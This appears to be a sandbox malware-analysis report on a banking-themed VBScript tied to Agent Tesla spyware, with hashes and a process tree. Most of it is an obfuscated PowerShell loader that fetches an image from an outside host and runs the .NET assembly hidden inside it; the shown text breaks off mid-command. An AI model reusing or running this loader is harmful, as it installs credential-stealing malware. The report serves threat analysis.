| File name: | Transferencia - BBVA.vbs |
| Full analysis: | https://app.any.run/tasks/a312d761-e5dd-457a-bb4c-42becc0c5537 |
| Verdict: | Malicious activity |
| Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
| Analysis date: | August 25, 2024, 09:25:38 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | Unicode text, UTF-16, little-endian text, with CRLF line terminators |
| MD5: | 61288A7ECC1674E16C5C18EB5090C4A7 |
| SHA1: | B04FF4EE075F71AE3AEAEEA3E64DDFFA57A8BD8A |
| SHA256: | 8B2DD1FA4DACEBA13B67A0F43098E3A1BC22120536CA0DEA4513A697BC6D82B1 |
| SSDEEP: | 12288:8EW2okXA9fjCS2QssJWtmECjKlWOFZ73g97s15uDjgh/OiRag6OxHW2OwxK+p+kh:8Mh7/gEdU/+g30 |
| .txt | | | Text - UTF-16 (LE) encoded (49.9) |
|---|---|---|
| .bas | | | Nevada BASIC tokenized source (25) |
| .mp3 | | | MP3 audio (24.9) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2256 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4248 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: AddInProcess.exe Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 6576 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Transferencia - BBVA.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 6632 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌VQBy♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBo♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bw♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌Og♶ ━ ⢚ ⬑ ⾌v♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌aQBh♶ ━ ⢚ ⬑ ⾌Dg♶ ━ ⢚ ⬑ ⾌M♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌z♶ ━ ⢚ ⬑ ⾌DE♶ ━ ⢚ ⬑ ⾌M♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌dQBz♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌YQBy♶ ━ ⢚ ⬑ ⾌GM♶ ━ ⢚ ⬑ ⾌a♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌HY♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌cgBn♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌3♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌aQB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQBz♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌dgBi♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌Xw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Nw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌DY♶ ━ ⢚ ⬑ ⾌Xw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Nw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌DY♶ ━ ⢚ ⬑ ⾌LwB2♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌cw♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Go♶ ━ ⢚ ⬑ ⾌c♶ ━ ⢚ ⬑ ⾌Bn♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Hc♶ ━ ⢚ ⬑ ⾌ZQBi♶ ━ ⢚ ⬑ ⾌EM♶ ━ ⢚ ⬑ ⾌b♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bgB0♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌E4♶ ━ ⢚ ⬑ ⾌ZQB3♶ ━ ⢚ ⬑ ⾌C0♶ ━ ⢚ ⬑ ⾌TwBi♶ ━ ⢚ ⬑ ⾌Go♶ ━ ⢚ ⬑ ⾌ZQBj♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌BT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌E4♶ ━ ⢚ ⬑ ⾌ZQB0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌VwBl♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌QwBs♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌ZQBC♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌B3♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌YgBD♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌aQBl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌EQ♶ ━ ⢚ ⬑ ⾌bwB3♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌b♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BE♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌Cg♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌VQBy♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌aQBt♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌ZwBl♶ ━ ⢚ ⬑ ⾌FQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌WwBT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌FQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌LgBF♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌YwBv♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌aQBu♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌XQ♶ ━ ⢚ ⬑ ⾌6♶ ━ ⢚ ⬑ ⾌Do♶ ━ ⢚ ⬑ ⾌VQBU♶ ━ ⢚ ⬑ ⾌EY♶ ━ ⢚ ⬑ ⾌O♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ec♶ ━ ⢚ ⬑ ⾌ZQB0♶ ━ ⢚ ⬑ ⾌FM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌By♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bgBn♶ ━ ⢚ ⬑ ⾌Cg♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌QgB5♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌ZQBz♶ ━ ⢚ ⬑ ⾌Ck♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌P♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌8♶ ━ ⢚ ⬑ ⾌EI♶ ━ ⢚ ⬑ ⾌QQBT♶ ━ ⢚ ⬑ ⾌EU♶ ━ ⢚ ⬑ ⾌Ng♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌F8♶ ━ ⢚ ⬑ ⾌UwBU♶ ━ ⢚ ⬑ ⾌EE♶ ━ ⢚ ⬑ ⾌UgBU♶ ━ ⢚ ⬑ ⾌D4♶ ━ ⢚ ⬑ ⾌Pg♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌P♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌8♶ ━ ⢚ ⬑ ⾌EI♶ ━ ⢚ ⬑ ⾌QQBT♶ ━ ⢚ ⬑ ⾌EU♶ ━ ⢚ ⬑ ⾌Ng♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌F8♶ ━ ⢚ ⬑ ⾌RQBO♶ ━ ⢚ ⬑ ⾌EQ♶ ━ ⢚ ⬑ ⾌Pg♶ ━ ⢚ ⬑ ⾌+♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌V♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌BP♶ ━ ⢚ ⬑ ⾌GY♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌Ck♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌ZQBU♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌B0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌E8♶ ━ ⢚ ⬑ ⾌Zg♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌RgBs♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Zw♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bz♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌YQBy♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌w♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQBn♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌r♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌ZwB0♶ ━ ⢚ ⬑ ⾌Gg♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌YQBz♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌Ng♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌Ew♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌cgB0♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YgBh♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌2♶ ━ ⢚ ⬑ ⾌DQ♶ ━ ⢚ ⬑ ⾌QwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌ZQBU♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌B0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌UwB1♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌aQBu♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌L♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YgBh♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌2♶ ━ ⢚ ⬑ ⾌DQ♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌ZwB0♶ ━ ⢚ ⬑ ⾌Gg♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BC♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌WwBT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌EM♶ ━ ⢚ ⬑ ⾌bwBu♶ ━ ⢚ ⬑ ⾌HY♶ ━ ⢚ ⬑ ⾌ZQBy♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌XQ♶ ━ ⢚ ⬑ ⾌6♶ ━ ⢚ ⬑ ⾌Do♶ ━ ⢚ ⬑ ⾌RgBy♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌bQBC♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌cwBl♶ ━ ⢚ ⬑ ⾌DY♶ ━ ⢚ ⬑ ⾌N♶ ━ ⢚ ⬑ ⾌BT♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌cgBp♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Zw♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YgBh♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌2♶ ━ ⢚ ⬑ ⾌DQ♶ ━ ⢚ ⬑ ⾌QwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bs♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌YQBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BB♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌cwBl♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YgBs♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌WwBT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌FI♶ ━ ⢚ ⬑ ⾌ZQBm♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌ZQBj♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQBv♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌LgBB♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌cwBl♶ ━ ⢚ ⬑ ⾌G0♶ ━ 